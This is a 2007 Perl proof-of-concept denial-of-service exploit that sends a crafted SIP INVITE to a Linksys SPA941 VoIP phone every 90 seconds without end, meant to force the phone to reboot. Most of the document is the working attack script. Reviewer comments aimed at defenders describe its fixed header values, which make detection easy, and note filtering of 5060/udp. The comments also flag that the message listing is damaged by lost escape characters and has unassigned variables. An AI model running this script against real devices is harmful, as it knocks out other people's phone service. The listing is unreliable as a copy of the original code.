# Title : Linksys SPA941 (remote reboot) Remote Denial of Service Exploit
# Published : 2007-04-24
# Author : MADYNES
#!/usr/bin/perl
use IO::Socket;
# Proof-of-concept published under the page title "Linksys SPA941 (remote
# reboot) Remote Denial of Service Exploit". What the code below does: it
# builds one SIP INVITE as a string and sends that same string over UDP to
# port 5060 of <dst_IP> every 90 seconds, forever.
#
# Reviewer notes for defenders:
#  - The request is built once, before the loop, so every datagram repeats the
#    same fixed values: branch=z9hG4bK00000, tag=779, display names "377" and
#    "779", a Call-ID beginning "10@", "Content-Length: 133" and SDP
#    "m=audio 9876". A real user agent would not reuse Call-ID/branch/tag like
#    this, which makes the traffic easy to match on.
#  - Content-Length is a hard-coded 133; it is not computed from the SDP body,
#    whose length varies with the source address.
#  - The Via header advertises <sourceport>, but the sending socket is bound to
#    local port 5061, so the two need not agree.
#  - Affected and fixed firmware versions are not stated on this page; consult
#    the vendor advisory. Limiting which hosts may reach the phone on 5060/udp
#    (normally only its SIP proxy) reduces exposure.
#
# Code-quality notes: no `use strict` / `use warnings`; most variables are
# package globals; arguments are used without validation.
#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless ($ARGV[2]);
# Only the first argument is checked; the other three are read unchecked below.
die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless ($ARGV[0]);
# $sock is bound to <SourceIp>:<sourceport> but is never used to send; its only
# later use is the `$sock or die` check before the loop.
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
# $socket is the handle actually used for sending: peer <dst_IP>:5060, local
# port fixed at 5061. Its creation is never checked for failure.
# NOTE(review): this mixes indirect-object `new` with `->new`; how Perl parses
# the combination is not obvious from here -- confirm before relying on it.
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
# Caller's user part: a random integer in the range 1..2000.
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
# SIP INVITE with an SDP body, assembled by string interpolation.
# NOTE(review): the listing as rendered on this page is damaged. Every line of
# the message ends in a bare `r` (it looks like an escape sequence lost in
# extraction), so names such as $cseqr and $sourceaddressr are variables that
# are never assigned, and `@$target` / `@$sourceaddress` inside a double-quoted
# string are array-dereference interpolations rather than a literal '@'.
# Treat the text below as a record of the message's shape, not a faithful copy.
$msg = "INVITE sip:$touser@$target SIP/2.0r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000r
From: 377<sip:$fromuserid@$sourceaddress>;tag=779r
To: Receiver <sip:$touser@$target>r
Call-ID: 10@$sourceaddressr
CSeq: 1 $cseqr
Contact: 779 <sip:$fromuserid@$sourceaddress>r
Expires: 1200r
Max-Forwards: 70r
Content-Type: application/sdpr
Content-Length: 133r
r
v=0r
o=0 0 0 IN IP4 $sourceaddressr
s=Session SDPr
c=IN IP4 $sourceaddressr
t=0 0r
m=audio 9876 RTP/AVP 0r
a=rtpmap:0 PCMU/8000r";
# This guards $sock (the unused socket), not $socket (the one used to send).
$sock or die "no socket :$!";
# Resend the identical datagram every 90 seconds; the return value of send()
# is not checked and the loop has no exit condition.
while (1){
$socket->send($msg);
sleep 90;
}